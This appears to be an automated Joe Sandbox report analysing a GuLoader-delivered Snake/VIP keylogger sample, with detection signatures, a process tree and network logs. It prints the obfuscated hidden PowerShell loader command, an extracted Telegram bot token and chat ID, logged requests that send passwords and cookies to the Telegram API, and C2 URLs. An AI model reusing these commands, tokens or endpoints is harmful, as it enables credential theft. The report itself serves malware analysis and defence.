Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r5yYt97sfB.exe

Overview

General Information

Sample name:r5yYt97sfB.exe
renamed because original name is a hash value
Original sample name:88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81.exe
Analysis ID:1587710
MD5:831a8a58088361d324c958970b8ed79c
SHA1:13366befe0af1ebb0665c81209dcab3388257cf0
SHA256:88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • r5yYt97sfB.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\r5yYt97sfB.exe" MD5: 831A8A58088361D324C958970B8ED79C)
    • powershell.exe (PID: 4236 cmdline: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7864 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI", "Chat_id": "8150022612", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: msiexec.exe PID: 7864JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7864, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 59370
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4236, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", CommandLine: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r5yYt97sfB.exe", ParentImage: C:\Users\user\Desktop\r5yYt97sfB.exe, ParentProcessId: 3452, ParentProcessName: r5yYt97sfB.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", ProcessId: 4236, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T17:17:33.553402+010028033053Unknown Traffic192.168.2.759374104.21.80.1443TCP
            2025-01-10T17:17:36.573806+010028033053Unknown Traffic192.168.2.759378104.21.80.1443TCP
            2025-01-10T17:17:40.018419+010028033053Unknown Traffic192.168.2.759382104.21.80.1443TCP
            2025-01-10T17:17:42.933167+010028033053Unknown Traffic192.168.2.759386104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T17:17:31.679110+010028032742Potentially Bad Traffic192.168.2.759372132.226.8.16980TCP
            2025-01-10T17:17:32.976159+010028032742Potentially Bad Traffic192.168.2.759372132.226.8.16980TCP
            2025-01-10T17:17:34.444924+010028032742Potentially Bad Traffic192.168.2.759375132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T17:17:26.605893+010028032702Potentially Bad Traffic192.168.2.759370216.58.206.46443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T17:17:52.314903+010018100081Potentially Bad Traffic192.168.2.759390149.154.167.220443TCP
            2025-01-10T17:17:54.940923+010018100081Potentially Bad Traffic192.168.2.759391149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T17:17:45.508646+010018100071Potentially Bad Traffic192.168.2.759389149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI", "Chat_id": "8150022612", "Version": "4.4"}
            Source: msiexec.exe.7864.11.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendMessage"}
            Source: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exeReversingLabs: Detection: 55%
            Source: r5yYt97sfB.exeVirustotal: Detection: 71%Perma Link
            Source: r5yYt97sfB.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: r5yYt97sfB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:59373 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59370 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:59371 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:59389 version: TLS 1.2
            Source: r5yYt97sfB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405974
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004064C6 FindFirstFileW,FindClose,1_2_004064C6
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004027FB FindFirstFileW,1_2_004027FB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DFF45Dh11_2_02DFF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DFF45Dh11_2_02DFF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DFFC19h11_2_02DFF974

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:59390 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:59389 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:59391 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.7:59308 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17Host: api.telegram.orgContent-Length: 585
            Source: global trafficHTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3255c2e76ef6Host: api.telegram.orgContent-Length: 1282
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:59375 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:59372 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59370 -> 216.58.206.46:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59374 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59386 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59382 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59378 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:59373 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17Host: api.telegram.orgContent-Length: 585
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 16:17:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: r5yYt97sfB.exe, r5yYt97sfB.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025E92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025E83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
